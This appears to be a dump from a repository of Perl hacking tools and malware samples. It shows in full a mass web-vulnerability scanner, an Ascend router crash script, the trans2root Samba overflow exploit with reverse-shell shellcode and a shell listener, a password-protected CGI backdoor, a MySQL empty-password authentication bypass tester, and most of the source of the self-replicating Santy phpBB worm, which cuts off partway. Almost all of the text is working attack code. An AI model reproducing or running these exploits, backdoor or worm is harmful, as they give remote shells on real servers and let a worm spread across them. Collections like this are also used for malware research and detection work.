"GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
"GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");
@names_u = ("_vti_inf.html ","service.pwd ","users.pwd ","authors.pwd ","administrators ",
"shtml.dll ","shtml.exe ","args.bat ","uploader.exe ","rguest.exe ",
"wguest.exe ","bdir - samples ","CGImail.exe ","newdsn.exe ","fpcount.exe ",
"openfile.cfm ","exprcalc.cfm ","dispopenedfile ","sendmail.cfm ","codebrws.asp ",
"codebrws.asp 2 ","showcode.asp ","search97.vts ","carbo.dll ");
############################# Above code not used ###########################################
###############################################################
$insecure = 0;
system "clear";
print "\n Energy PHP Fast Scanner \n\n";
use IO::Socket;
my ($port, $sock,$server);
$size=0;
################################ SCAN ##########################
if(! $ARGV[0])
{
&usage;
exit;
}
$port = $ARGV[2];
if(! $ARGV[2]) { $port = 80; }
open (HOSTFILE, "$ARGV[0]");
@hostfile = <HOSTFILE>;
chop(@hostfile);
$hostlength = @hostfile;
$hostcount = 0;
while ($hostcount < $hostlength) {
print ("working on @hostfile[$hostcount]...\n");
$server = (@hostfile[$hostcount]);
&connect;
$hostcount++;
}
print "Scanner dropper \n";
##########################################################
sub connect {
#print "[Trying $server]\n";
$sock = IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => 'tcp');
if ($sock) {
print "[Connected to $server on $port]\n";
$n=0;
&version;
close(sock);
$size++;
} else {
}
}
###########################################################
sub version {
$ver = "HEAD / HTTP/1.0\n\n";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
# I do believe this should be taken out-------------------------
# However unhash below to activate interactive optional deep mode.
# print "[Server version is]:\n[##############################]\n";
# while(<SOCK>)
# {
# print;
# }
# print "[##############################]\n";
# print "Would you like normal or deep scan?\n [Normal-1, Deep-2, or Quit-3]:";
# $n=0;
# chomp($type=<STDIN>);
# Note if above is unhashed these two lines must be hashed.
$n=0;
$type=1;
if($type eq 3)
{ print "Scan aborted!\n"; exit; }
if($type eq 1)
{
foreach $scripts_w(@scripts_w)
{
print "Searching for @names_w[$n] : ";
$scw=$scripts_w;
$name = @names_w[$n];
&win_scan;
$n++;
}
}
else {
foreach $scripts_u(@scripts_u)
{
print "Searching for [@names_u[$n]] : ";
$sc=$scripts_u;
$name = @names_u[$n];
&win2_scan;
$n++;
}
}
close(SOCK);
}
#################################################################
sub win_scan {
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,$scw,0);
$check=<SOCK>;
($http,$code,$blah) = split(/ /,$check);
if($code == 200)
{
print "[Found!]\n";
open (OUT, ">>$ARGV[1]");
print OUT ("$server - [@names_w[$n]] \n");
close (OUT);
$insecure++;
}
else
{
print "[Not Found]\n";
}
close(SOCK);
}
###############################################################
sub win2_scan {
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,$sc,0);
$check=<SOCK>;
($http,$code,$blah) = split(/ /,$check);
if($code == 200)
{
print "[Found!]\n";
$insecure++;
}
else
{
print "[Not Found]\n";
}
close(SOCK);
}
################################ USAGE ##########################
sub usage {
system "clear";
print "\n\n\n Fast Scanner \n\n";
print " || by Energy || \n\n";
print "Used to mass scan Windows,IRIX and Linux b0x\n\n";
print "Usage: perl usdl.pl hostlist.txt logfile.txt [porta]\n\n";
exit(0); }
################################ END ##########################
print "[Test $size hosts $port e $insecure sites vulnerable]\n";

57
Perl/HackTool.Perl.Small.f Normal file
View File

@ -0,0 +1,57 @@
#
# Ascend Kill II - perl version
# (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com>
#
# Released: 3/17/98
#
# Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
#
# NOTE: This program is NOT to be used for malicous purposes. This is
# intenteded for educational purposes only. By using this program
# you agree to use this for lawfull purposes ONLY.
#
#
use Socket;
require "getopts.pl";
sub AF_INET {2;}
sub SOCK_DGRAM {2;}
sub ascend_kill {
$remotehost = shift(@_);
chop($hostname = `hostname`);
$port = 9;
$SIG{'INT'} = 'dokill';
$sockaddr = 'S n a4 x8';
($pname, $aliases, $proto) = getprotobyname('tcp');
($pname, $aliases, $port) = getservbyname($port, 'tcp')
unless $port =~ /^\d+$/;
($pname, $aliases, $ptype, $len, $thisaddr) =
gethostbyname($hostname);
$this = pack($sockaddr, AF_INET, 0, $thisaddr);
($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);
$that = pack($sockaddr, AF_INET, $port, $thataddr);
socket(S, &AF_INET, &SOCK_DGRAM, 0);
$msg = pack("c64",
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53);
for ($i=0; $i<500; $i++) {
$msg .= pack("c1", 0xff);
}
send(S,$msg,0,$that) || die "send:$!";
}
if ($ARGV[0] eq '') {
print "usage: akill2.pl <remote_host>\n";
exit;
}
&ascend_kill($ARGV[0]);

492
Perl/HackTool.Perl.TransRoot Normal file
View File

@ -0,0 +1,492 @@
###############
##[ Header
# Name: trans2root.pl
# Purpose: Proof of concept exploit for Samba 2.2.x (trans2open overflow)
# CVE: CAN-2003-0201
# Author: H D Moore <hdmoore@digitaldefense.net>
# Copyright: Copyright (C) 2003 Digital Defense Inc.
# Release Date: April 7, 2003
# Revision: 1.0
# Download: http://www.digitaldefense.net/labs/securitytools.html
# Modified: By SARA team to incorporate for sara
##
use strict;
use Socket;
use IO::Socket;
use IO::Select;
use POSIX;
use Getopt::Std;
$SIG{USR2} = \&GoAway;
my %args;
my %targets =
(
"linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
"solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
"fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
# name # default # start # end # step # function
);
getopt('t:M:h:p:r:x:H:P:', \%args);
my $target_type = $args{t} || Usage();
my $target_host = $args{h} || Usage();
my $local_host = $args{H} || Usage();
my $local_port = $args{P} || 1981;
my $target_port = $args{p} || 139;
my $mode = $args{x} || "";
my $target_mode = "brute";
if (! exists($targets{$target_type})) { Usage(); }
print "[*] Using target type: $target_type\n";
# allow single mode via the -M option
if ($args{M} && uc($args{M}) eq "S")
{
$target_mode = "single";
}
# the parent process listens for an incoming connection
# the child process handles the actual exploitation
my $listen_pid = $$;
my $exploit_pid = StartListener($local_port);
# get the default return address for single mode
my $targ_ret = $args{r} || $targets{$target_type}->[0];
my $curr_ret;
$targ_ret = eval($targ_ret);
if ($target_mode !~ /brute|single/)
{
print "[*] Invalid attack mode: $target_mode (single or brute only)\n";
exit(0);
}
if ($target_mode eq "single")
{
$curr_ret = $targ_ret;
if(! $targ_ret)
{
print "[*] Invalid return address specified!\n";
kill("USR2", $listen_pid);
exit(0);
}
print "[*] Starting single shot mode...\n";
printf ("[*] Using return address of 0x%.8x\n", $targ_ret);
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
if ($target_mode eq "brute")
{
print "[*] Starting brute force mode...\n";
for (
$curr_ret =$targets{$target_type}->[1];
$curr_ret >= $targets{$target_type}->[2];
$curr_ret -=$targets{$target_type}->[3]
)
{
select(STDOUT); $|++;
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
printf (" \r[*] Return Address: 0x%.8x", $curr_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
}
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
sub Usage {
print STDERR "\n";
print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n";
print STDERR "===========================================================\n\n";
print STDERR " Usage: \n";
print STDERR " $0 <options> -t <target type> -H <your ip> -h <target ip>\n";
print STDERR " Options: \n";
print STDERR " -M (S|B) <single or brute mode>\n";
print STDERR " -r <return address for single mode>\n";
print STDERR " -p <alternate Samba port>\n";
print STDERR " -P <alternate listener port>\n";
print STDERR " Targets:\n";
foreach my $type (keys(%targets))
{
print STDERR " $type\n";
}
print STDERR "\n";
exit(1);
}
sub StartListener {
my ($local_port) = @_;
my $listen_pid = $$;
my $s = IO::Socket::INET->new (
Proto => "tcp",
LocalPort => $local_port,
Type => SOCK_STREAM,
Listen => 3,
ReuseAddr => 1
);
if (! $s)
{
print "[*] Could not start listener: $!\n";
exit(0);
}
print "[*] Listener started on port $local_port\n";
my $exploit_pid = fork();
if ($exploit_pid)
{
my $victim;
$SIG{USR2} = \&GoAway;
while ($victim = $s->accept())
{
kill("USR2", $exploit_pid);
if ($mode eq "Sara") {
print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n";
StartShell($victim);
} else {
print "System is vulnerable to attack\n";
exit(0);
}
}
exit(0);
}
return ($exploit_pid);
}
sub StartShell {
my ($client) = @_;
my $sel = IO::Select->new();
Unblock(*STDIN);
Unblock(*STDOUT);
Unblock($client);
select($client); $|++;
select(STDIN); $|++;
select(STDOUT); $|++;
$sel->add($client);
$sel->add(*STDIN);
print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n";
print $client "echo \n";
while (fileno($client))
{
my $fd;
my @fds = $sel->can_read(0.2);
foreach $fd (@fds)
{
my @in = <$fd>;
if(! scalar(@in)) { next; }
if (! $fd || ! $client)
{
print "[*] Closing connection.\n";
close($client);
exit(0);
}
if ($fd eq $client)
{
print STDOUT join("", @in);
} else {
print $client join("", @in);
}
}
}
close ($client);
}
sub AttemptExploit {
my ($Host, $Port, $Exploit) = @_;
my $res;
my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type => SOCK_STREAM, Protocol => "tcp");
if (! $s)
{
print "\n[*] Error: could not connect: $!\n";
kill("USR2", $listen_pid);
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
Unblock($s);
my $SetupSession =
"\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01".
"\x00\x00\x00\x00";
my $TreeConnect =
"\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00".
"\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24".
"\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50".
"\x43\x24";
my $Flush = ("\x00" x 808);
print $s $SetupSession;
$res = ReadResponse($s);
print $s $TreeConnect;
$res = ReadResponse($s);
# uncomment this for diagnostics
# print "[*] Press Enter to Continue...\n";
# $res = <STDIN>;
print "[*] Sending Exploit Buffer...\n";
print $s $Exploit;
print $s $Flush;
ReadResponse($s);
close($s);
}
sub CreateBuffer_linx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
$RetAddr = pack("l", $RetAddr);
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the trans2open overflow
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
GetNops(772) .
# xor decoder courtesy of hsj
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
# reverse-connect, mangled lamagra code + fixes
"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b".
"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a".
"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d".
$p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4.
"\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67".
"\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e".
"\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b".
"\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60".
"\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa".
"\xfd\xbc\xe0\xfb".
GetNops(87).
($RetAddr x 8).
"DDI!". ("\x00" x 277);
return $exploit;
}
sub CreateBuffer_solx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
my $IckAddr = $RetAddr - 512;
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the trans2open overflow
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
GetNops(813) .
# xor decoder courtesy of hsj
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
# reverse-connect, code by bighawk
"\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2".
"\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb".
$a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
"\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a".
"\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb".
"\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8".
"\x6c\x46".
GetNops(87) .
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("\x00" x 277);
return $exploit;
}
sub CreateBuffer_bsdx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
my $IckAddr = $RetAddr - 512;
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the trans2open overflow
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
GetNops(830) .
# xor decoder courtesy of hsj
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
# reverse-connect, code by bighawk
"\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50".
"\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
"\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23".
"\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb".
"\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13".
GetNops(87) .
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("\x00" x 277);
return $exploit;
}
sub Unblock {
my $fd = shift;
my $flags;
$flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}
sub GoAway {
exit(0);
}
sub ReadResponse {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub HexDump {
my ($data) = @_;
my @x = split(//, $data);
my $cnt = 0;
foreach my $h (@x)
{
if ($cnt > 16)
{
print "\n";
$cnt = 0;
}
printf("\\x%.2x", ord($h));
$cnt++;
}
print "\n";
}
# thank you k2 ;)
sub GetNops {
my ($cnt) = @_;
my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97".
"\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b".
"\xf5\x45\x4c");
return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]);
}

48
Perl/HackTool.Perl.Ulgin Normal file
View File

@ -0,0 +1,48 @@
# jerusalem (c) 2001
# heavily untested and on_the_fly done cgi (i've written this code on my
# organizer) - jerusalem@digitalmaphia.com / j3rus4lem@users.sourceforge.net
$password = "phj34r"; # as usual
## -note
## if you don't want to show your password in clear (in the sourcecode)
## use perl's crypt() function. a bogus example of this can be found
## into http://sgxxx.net/users/jerusalem/ulogin.pl *subliminal message*
use CGI qw/:standard/;
print header,
start_html('cgi backdoor - jerusalem\@digitalmaphia.com 2001'),
h1('cgi backdoor - jerusalem\@digitalmaphia.com 2001'),
start_form,
"password: ",password_field('pass'),p,
"port: ",textfield('port'),
# if you want your pass shown in clear just subst the password_field() function
# with a textfield() one
submit,
end_form,
hr;
if (param()) {
$pass = "<EM>"."$password"."</EM>";
if (em(param('pass')) eq $pass) { werk(); }
else { stfu(); }
sub stfu { print "password incorrect. sorry.\n"; }
hr;
}
# This subroutine is a little and bogus example of what you can do
# using a perl cgi. In this case, a daemon like the unix' echo is
# started and forked under a pid.
sub werk {
$aaa = em(param('port'));
$aaa =~ s/<.*?>//g;
my $pid = fork(); if ($pid) { exit(); }
yeha();
sub yeha {
use IO::Socket;
my $port = $aaa;
my $socket = IO::Socket::INET->new(Listen => 5,
LocalPort => $port,
Proto => 'tcp',
Reuse => 1);
while ($new = $socket->accept()) { $new->autoflush(1); command(); }
sub command { while (<$new>) { $comm = $_; chomp $comm;
print $new "$comm\n";
command(); } }
}
}

139
Perl/HackTool.Perl.VulnTest.a Normal file
View File

@ -0,0 +1,139 @@
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# The following Perl script can be used to test your version of MySQL. It will display
# the login packet sent to the server and it's reply.
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# elik beyondsecurity com
#
use strict;
use IO::Socket::INET;
usage() unless ((@ARGV >= 1) || (@ARGV <= 3));
my $username = shift(@ARGV);
my $host = shift(@ARGV);
if (!$host)
{
usage();
}
my $port = shift(@ARGV);
if (!$port)
{
$port = 3306; print "Using default MySQL port (3306)\n";
}
# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
# receive greeting
my $reply;
recv($socket, $reply, 1024, 0);
if (length($reply) < 7)
{
print "Not allowed to connect to MySQL!\n";
exit(1);
}
print "Received greeting:\n";
HexDump($reply);
print "\n";
# here we define the login OK reply
# my $login_ok = "\x01\x00\x00\x02\xFE";
# break the username string into chars and rebuild it
my $binuser = pack("C*", unpack("C*", $username));
# send login caps packet with password
my $packet = "\x85\xa6".
"\x03\x00\x00".
"\x00".
"\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash
substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)
print "Sending caps packet:\n";
HexDump($packet);
print "\n";
send $socket, $packet, 0;
# receive reply
recv($socket, $reply, 1024, 0);
print "Received reply:\n";
HexDump($reply);
my @list_bytes = unpack("C*", $reply);
#print "The fifth byte is: ", $list_bytes[4], "\n";
if (length(@list_bytes) >= 4)
{
print "Response insufficent\n";
}
#if ($reply eq $login_ok)
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
{
print "Received OK reply, authentication successful!!\n";
}
else
{
print "Authentication failed!\n";
}
# close
close($socket);
sub usage
{
# print usage information
print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n
<username> - The DB username to authenticate as
<host> - The host to connect to
[port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";
exit(1);
}
###
# do a hexdump of a string (assuming it's binary)
###
sub HexDump
{
my $buffer = $_[0];
# unpack it into chars
my @up = unpack("C*", $buffer);
my $pos=0;
# calculate matrix sizes
my $rows = int(@up/16);
my $leftover = int(@up%16);
for( my $row=0; $row < $rows; $row++, $pos+=16)
{
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+15];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}
# print last line
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+$leftover-1];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}

212
Perl/Net-Worm.Perl.Santy.c Normal file
View File

@ -0,0 +1,212 @@
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# -SECU For educational purpose
#
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.f-secure.com/v-descs/santy_a.shtml
#
use
strict;
use Socket;
sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();
sub GrabURL($);
sub str2chr($);
eval{ fork and exit; };
my $generation = x;
PayLoad() if $generation > 3;
open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;
while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}
$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;
my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';
while(1) {
exit if -e 'stop.it';
OUTER: for my $url (GoGoogle()) {
exit if -e 'stop.it';
$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;
while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $portion;
next OUTER unless GrabURL($url);
}
my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;
GrabURL($url);
}
}
sub str2chr($) {
my $s = shift;
$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;
return $s;
}
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) .
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}
return @urls;
}
sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);
my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}
my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);
connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;
my $answer = join '', <Server>;
close (Server);
return $answer;
}
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
